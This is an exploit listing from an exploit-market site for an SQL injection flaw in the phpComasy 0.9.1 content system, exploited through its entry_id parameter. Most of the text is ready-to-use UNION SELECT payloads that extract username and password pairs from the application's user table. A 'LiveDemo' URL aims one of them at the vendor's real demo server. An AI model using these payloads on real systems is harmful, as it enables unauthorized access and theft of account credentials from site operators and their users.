[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpComasy 0.9.1 (entry_id) SQL Injection Vulnerability

Author
boom3rang
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4935
Category
web applications
Date add
16-03-2009
Platform
unsorted
======================================================
phpComasy 0.9.1 (entry_id) SQL Injection Vulnerability
======================================================


###################################################
phpComasy(entry_id) SQL-injection Vulnerability
###################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  N/W
--------------------------------------------------
#[!] Name          :  phpComasy   
#[!] Site          :  www.phpcomasy.com
#[!] Download      :  http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9
###################################################


[-] Example: 
http://localhost/Path/?id=22&entry_id=[SQL-injection]

[-] Exploit:
-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user--
or
-9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail

LiveDemo:
http://demo.phpcomasy.com/?id=22&entry_id=-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user--&mod_action=detail

##############################



#  0day.today [2024-12-25]  #